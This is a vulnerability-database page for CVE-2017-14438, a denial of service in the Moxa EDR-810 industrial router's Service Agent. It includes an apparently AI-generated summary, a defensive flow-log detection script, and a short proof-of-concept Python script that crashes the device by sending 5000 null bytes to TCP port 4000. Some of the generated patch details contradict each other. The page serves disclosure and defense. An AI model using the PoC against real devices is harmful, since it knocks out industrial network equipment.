CVE-2017-14438
Description
Exploitable denial of service vulnerabilities exist in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A denial of service vulnerability in Moxa EDR-810 Service Agent allows remote attackers to crash the device by sending a large packet to TCP port 4000.
Vulnerability
The Moxa EDR-810 Service Agent, present in firmware version V4.1 build 17030317, listens on TCP and UDP port 4000. Improper input validation (CWE-20) in the handling of incoming data allows a specially crafted large packet to cause a crash. The vulnerability is triggered by sending a packet larger than expected, such as 5000 null bytes, to TCP port 4000 [1].
Exploitation
An attacker can exploit this vulnerability remotely without authentication. The attacker sends a large packet (e.g., 5000 bytes of zeros) to TCP port 4000 of the target device. The crash occurs consistently on the first attempt, as demonstrated by the proof-of-concept script provided in the advisory [1]. No user interaction or special network position is required beyond network access to the device.
Impact
Successful exploitation results in a denial of service, crashing the Service Agent and potentially the entire device. The impact is limited to availability loss (A:H); no confidentiality or integrity compromise is reported. The device may require a manual reboot to restore functionality.
Mitigation
The vendor released a patched firmware on April 12, 2018, which addresses this vulnerability. Users should update to the latest firmware version available from Moxa's website. No workarounds are documented. This vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Talos/Moxa (v5), Range: Moxa EDR-810 V4.1 build 17030317
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input size validation in the Service Agent allows oversized packets to cause a crash."
Attack vector
An unauthenticated attacker on the network sends a large packet (e.g., 5000 null bytes) to TCP port 4000 of the Moxa EDR-810. The Service Agent fails to validate the size of the incoming data, causing a crash and denial of service [CWE-20] [ref_id=1]. The same attack can be directed at TCP port 4001, though multiple attempts may be needed to trigger the crash consistently [ref_id=1].
Affected code
The Service Agent functionality of Moxa EDR-810 V4.1 build 17030317 listens on TCP/UDP port 4000 and TCP port 4001. Sending a large packet to these ports causes the Service Agent to crash [ref_id=1].
What the fix does
The advisory does not include a patch diff. The vendor (Moxa) released patched firmware on April 12, 2018 to address the vulnerability [ref_id=1]. The fix presumably adds input size validation to the Service Agent's packet handling on ports 4000 and 4001 to reject oversized packets before they cause a crash.
Preconditions
- network: The attacker must be able to reach TCP port 4000 (or 4001) on the Moxa EDR-810 device
- auth: No authentication is required
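The attack vector and preconditions above suggest a network-side check: flag flows to the Service Agent ports whose client payload is far larger than normal. The following is an added example, not code from the Talos advisory or from Moxa; the CSV column names, the 1024-byte threshold, and every address other than 192.168.127.254 are assumptions made for illustration.

```python
import csv
import io
from collections import Counter

# Ports the page names for the Service Agent: TCP/UDP 4000 and TCP 4001.
SERVICE_AGENT_PORTS = {("tcp", 4000), ("udp", 4000), ("tcp", 4001)}
# Assumption: legitimate requests are far smaller than the 5000-byte trigger
# described on the page. Tune this to the traffic seen on your own network.
MAX_EXPECTED_BYTES = 1024

# Constructed sample flow records (not captured traffic). Column names are
# hypothetical; map them from whatever your flow or connection log exports.
SAMPLE_FLOWS = """\
ts,src,dst,proto,dst_port,orig_bytes
1700000000,192.168.127.10,192.168.127.254,tcp,4000,212
1700000005,192.168.127.77,192.168.127.254,tcp,4000,5000
1700000009,192.168.127.77,192.168.127.254,tcp,4001,5000
1700000011,192.168.127.77,192.168.127.254,tcp,4001,5000
1700000020,192.168.127.10,192.168.127.254,tcp,443,9000
1700000030,192.168.127.77,192.168.127.254,udp,4000,-
1700000040,192.168.127.10,192.168.127.254,tcp,4000,4096
"""


def find_oversized(flow_csv, device_ips, allowed_sources=frozenset()):
    """Return (alerts, per-source counts) for oversized Service Agent flows."""
    alerts, per_source = [], Counter()
    for row in csv.DictReader(io.StringIO(flow_csv)):
        try:
            src, dst, ts = row["src"], row["dst"], row["ts"]
            key = (row["proto"].lower(), int(row["dst_port"]))
            sent = int(row["orig_bytes"])
        except (KeyError, ValueError, TypeError, AttributeError):
            continue  # malformed or incomplete record: skip, keep scanning
        if dst not in device_ips or key not in SERVICE_AGENT_PORTS:
            continue
        if sent <= MAX_EXPECTED_BYTES:
            continue
        # Oversized data from an unlisted source is the higher-priority case.
        severity = "medium" if src in allowed_sources else "high"
        alerts.append({"ts": ts, "src": src, "port": key[1],
                       "bytes": sent, "severity": severity})
        per_source[src] += 1  # repeats matter: port 4001 may need retries
    return alerts, dict(per_source)


if __name__ == "__main__":
    found, counts = find_oversized(SAMPLE_FLOWS, {"192.168.127.254"},
                                   allowed_sources={"192.168.127.10"})
    print(*found, counts, sep="\n")
```

The per-source count is returned because the page notes that port 4001 may take several attempts, so repeated oversized flows from one source are a stronger signal than a single one.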
Reproduction
The following Python script from the Talos advisory crashes the Service Agent on port 4000 [ref_id=1]:
```python
import socket

host = '192.168.127.254'
port = 4000
packet = b"\x00" * 5000  # 5000 null bytes (bytes literal so send() accepts it)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close()
```
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. www.talosintelligence.com/vulnerability_reports/TALOS-2017-0487 (mitre, x_refsource_MISC)